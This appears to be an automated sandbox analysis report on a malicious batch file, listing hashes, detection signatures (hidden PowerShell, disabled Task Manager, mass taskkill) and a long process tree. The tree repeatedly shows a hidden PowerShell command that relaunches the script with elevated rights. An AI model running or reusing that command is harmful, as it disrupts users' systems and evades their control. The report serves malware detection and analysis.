14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f

Analysis

max time kernel
6s
max time network
54s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
08-09-2024 06:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

89f798a5159a32183eb30196d01f1332
SHA1

a9d25c229a0c10acdc45afdb75d67a8b986cd4f0
SHA256

14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f
SHA512

add8be87d110b65818a30ef77fc3e9e708b810d9e982693525a9ce11d6e1c7f1fda8d3486b80c21a928902705c113a98a069f88fd2274fec152b6aa13f7df1f0
SSDEEP

96:oDmjh7cQGQI9cQITKlQI9uO3DPVqdCgNlWroMu7eQ/Gx6fGfZUX9fQ1ZXkNQI9Iu:oCN7hsTPsdCgVM0emG8bx

Score

8^/10

evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3560	powershell.exe
5936	powershell.exe
6912	powershell.exe
7428	powershell.exe
6640	powershell.exe
1564	powershell.exe
6008	powershell.exe
5864	powershell.exe
5380	powershell.exe
6664	powershell.exe
6160	powershell.exe
7096	powershell.exe
6440	powershell.exe
6004	powershell.exe
8332	powershell.exe
764	powershell.exe
3372	powershell.exe
5432	powershell.exe
5508	powershell.exe
6508	powershell.exe
7808	powershell.exe
1056	powershell.exe
6788	powershell.exe
4016	powershell.exe
6072	powershell.exe
4556	powershell.exe
6004	powershell.exe
700	powershell.exe
5652	powershell.exe
3280	powershell.exe
1656	powershell.exe
5888	powershell.exe
2348	powershell.exe
6064	powershell.exe
7640	powershell.exe
4720	powershell.exe
2124	powershell.exe
7208	powershell.exe
7832	powershell.exe
2188	powershell.exe
764	powershell.exe
5596	powershell.exe
6912	powershell.exe
2356	powershell.exe
5780	powershell.exe
7396	powershell.exe
6936	powershell.exe
4560	powershell.exe
3844	powershell.exe
7584	powershell.exe
7364	powershell.exe
2072	powershell.exe
1804	powershell.exe
4488	powershell.exe
8128	powershell.exe
4184	powershell.exe
5500	powershell.exe
1568	powershell.exe
4500	powershell.exe
5776	powershell.exe
4264	powershell.exe
4576	powershell.exe
5164	powershell.exe
6672	powershell.exe

Disables Task Manager via registry modification
evasion

Kills process with taskkill 64 IoCs

evasion

pid	Process
8944	taskkill.exe
2408	taskkill.exe
5216	taskkill.exe
1400	taskkill.exe
5720	taskkill.exe
8780	taskkill.exe
1760	taskkill.exe
5136	taskkill.exe
8668	taskkill.exe
8900	taskkill.exe
4140	taskkill.exe
5400	taskkill.exe
9012	taskkill.exe
2392	taskkill.exe
404	taskkill.exe
8468	taskkill.exe
8732	taskkill.exe
8980	taskkill.exe
7004	taskkill.exe
5652	taskkill.exe
5396	taskkill.exe
6108	taskkill.exe
9004	taskkill.exe
5400	taskkill.exe
6304	taskkill.exe
8324	taskkill.exe
8420	taskkill.exe
8804	taskkill.exe
8868	taskkill.exe
4824	taskkill.exe
6928	taskkill.exe
6408	taskkill.exe
5136	taskkill.exe
6980	taskkill.exe
5192	taskkill.exe
8428	taskkill.exe
6048	taskkill.exe
5696	taskkill.exe
4088	taskkill.exe
3132	taskkill.exe
8184	taskkill.exe
6888	taskkill.exe
8772	taskkill.exe
8860	taskkill.exe
5500	taskkill.exe
5156	taskkill.exe
5652	taskkill.exe
5668	taskkill.exe
7196	taskkill.exe
4832	taskkill.exe
5756	taskkill.exe
8376	taskkill.exe
5892	taskkill.exe
6100	taskkill.exe
8180	taskkill.exe
8436	taskkill.exe
2280	taskkill.exe
5284	taskkill.exe
7052	taskkill.exe
4216	taskkill.exe
8704	taskkill.exe
344	taskkill.exe
1956	taskkill.exe
8972	taskkill.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
764	powershell.exe
764	powershell.exe
764	powershell.exe
2364	powershell.exe
2364	powershell.exe
3560	powershell.exe
3560	powershell.exe
2364	powershell.exe
3560	powershell.exe
3400	powershell.exe
3400	powershell.exe
3400	powershell.exe
3532	powershell.exe
4264	powershell.exe
3532	powershell.exe
4264	powershell.exe
3532	powershell.exe
4264	powershell.exe
4832	powershell.exe
4832	powershell.exe
4832	powershell.exe
2348	powershell.exe
2348	powershell.exe
2348	powershell.exe
2072	powershell.exe
2072	powershell.exe
2072	powershell.exe
3844	powershell.exe
3844	powershell.exe
3844	powershell.exe
4384	powershell.exe
3656	powershell.exe
3656	powershell.exe
4384	powershell.exe
3656	powershell.exe
4184	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	3560	powershell.exe
Token: SeDebugPrivilege	3400	powershell.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 4760 wrote to memory of 4484	4760	cmd.exe	74
PID 4760 wrote to memory of 4484	4760	cmd.exe	74
PID 4484 wrote to memory of 764	4484	cmd.exe	76
PID 4484 wrote to memory of 764	4484	cmd.exe	76
PID 764 wrote to memory of 2640	764	powershell.exe	77
PID 764 wrote to memory of 2640	764	powershell.exe	77
PID 4484 wrote to memory of 2364	4484	cmd.exe	79
PID 4484 wrote to memory of 2364	4484	cmd.exe	79
PID 2640 wrote to memory of 3560	2640	cmd.exe	80
PID 2640 wrote to memory of 3560	2640	cmd.exe	80
PID 2364 wrote to memory of 5100	2364	powershell.exe	81
PID 2364 wrote to memory of 5100	2364	powershell.exe	81
PID 3560 wrote to memory of 4344	3560	powershell.exe	82
PID 3560 wrote to memory of 4344	3560	powershell.exe	82
PID 2640 wrote to memory of 3400	2640	cmd.exe	84
PID 2640 wrote to memory of 3400	2640	cmd.exe	84
PID 4484 wrote to memory of 3532	4484	cmd.exe	109
PID 4484 wrote to memory of 3532	4484	cmd.exe	109
PID 4344 wrote to memory of 4264	4344	cmd.exe	234
PID 4344 wrote to memory of 4264	4344	cmd.exe	234
PID 3400 wrote to memory of 196	3400	powershell.exe	135
PID 3400 wrote to memory of 196	3400	powershell.exe	135
PID 3532 wrote to memory of 4396	3532	powershell.exe	88
PID 3532 wrote to memory of 4396	3532	powershell.exe	88
PID 2640 wrote to memory of 4832	2640	cmd.exe	89
PID 2640 wrote to memory of 4832	2640	cmd.exe	89
PID 4264 wrote to memory of 496	4264	powershell.exe	90
PID 4264 wrote to memory of 496	4264	powershell.exe	90
PID 4344 wrote to memory of 2348	4344	cmd.exe	331
PID 4344 wrote to memory of 2348	4344	cmd.exe	331
PID 4396 wrote to memory of 632	4396	csc.exe	140
PID 4396 wrote to memory of 632	4396	csc.exe	140
PID 4832 wrote to memory of 4492	4832	powershell.exe	94
PID 4832 wrote to memory of 4492	4832	powershell.exe	94
PID 4492 wrote to memory of 3880	4492	csc.exe	95
PID 4492 wrote to memory of 3880	4492	csc.exe	95
PID 496 wrote to memory of 2072	496	cmd.exe	263
PID 496 wrote to memory of 2072	496	cmd.exe	263
PID 4484 wrote to memory of 4136	4484	cmd.exe	97
PID 4484 wrote to memory of 4136	4484	cmd.exe	97
PID 4484 wrote to memory of 3844	4484	cmd.exe	418
PID 4484 wrote to memory of 3844	4484	cmd.exe	418
PID 2348 wrote to memory of 5020	2348	powershell.exe	99
PID 2348 wrote to memory of 5020	2348	powershell.exe	99
PID 2640 wrote to memory of 1636	2640	cmd.exe	142
PID 2640 wrote to memory of 1636	2640	cmd.exe	142
PID 2072 wrote to memory of 4456	2072	powershell.exe	101
PID 2072 wrote to memory of 4456	2072	powershell.exe	101
PID 2640 wrote to memory of 4384	2640	cmd.exe	103
PID 2640 wrote to memory of 4384	2640	cmd.exe	103
PID 496 wrote to memory of 3656	496	cmd.exe	104
PID 496 wrote to memory of 3656	496	cmd.exe	104
PID 3844 wrote to memory of 2204	3844	powershell.exe	105
PID 3844 wrote to memory of 2204	3844	powershell.exe	105
PID 2204 wrote to memory of 2584	2204	csc.exe	106
PID 2204 wrote to memory of 2584	2204	csc.exe	106
PID 4456 wrote to memory of 4184	4456	cmd.exe	107
PID 4456 wrote to memory of 4184	4456	cmd.exe	107

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4760
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:764
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3560
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4264
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2072
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:4456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4184
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        12⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4560
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        14⤵
        
        PID:4164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        16⤵
        
        PID:3612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1056
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        18⤵
        
        PID:2176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2188
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        20⤵
        
        PID:196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:764
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        22⤵
        
        PID:632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1656
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        24⤵
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:764
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        26⤵
        
        PID:3124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        27⤵
        
        PID:756
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        28⤵
        
        PID:1436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3372
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        30⤵
        
        PID:5604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5936
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        32⤵
        
        PID:5524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5864
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        34⤵
        
        PID:4448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5500
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        36⤵
        
        PID:5808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5380
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        38⤵
        
        PID:5052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6072
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        40⤵
        
        PID:5252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1568
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        42⤵
        
        PID:5232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        43⤵
        
        PID:5952
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        44⤵
        
        PID:5288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4488
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        46⤵
        
        PID:6120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4556
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        48⤵
        
        PID:5472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6672
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        50⤵
        
        PID:6164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        52⤵
        
        PID:6380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6788
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        54⤵
        
        PID:5736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5780
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        56⤵
        
        PID:6468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2124
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        58⤵
        
        PID:6832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7096
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        60⤵
        
        PID:6088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        62⤵
        
        PID:7004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3844
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        64⤵
        
        PID:316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6004
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        66⤵
        
        PID:7384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        67⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7208
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        68⤵
        
        PID:7944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7584
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        70⤵
        
        PID:6544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        71⤵
        
        PID:3136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        72⤵
        
        PID:6800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        73⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7640
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        74⤵
        
        PID:7572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        75⤵
        
        PID:6528
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        76⤵
        
        PID:7868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        77⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:700
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        78⤵
        
        PID:6476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        79⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6936
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        80⤵
        
        PID:6252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        81⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7808
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        82⤵
        
        PID:6408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        83⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5652
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        84⤵
        
        PID:832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        85⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1564
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        86⤵
        
        PID:7128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        87⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
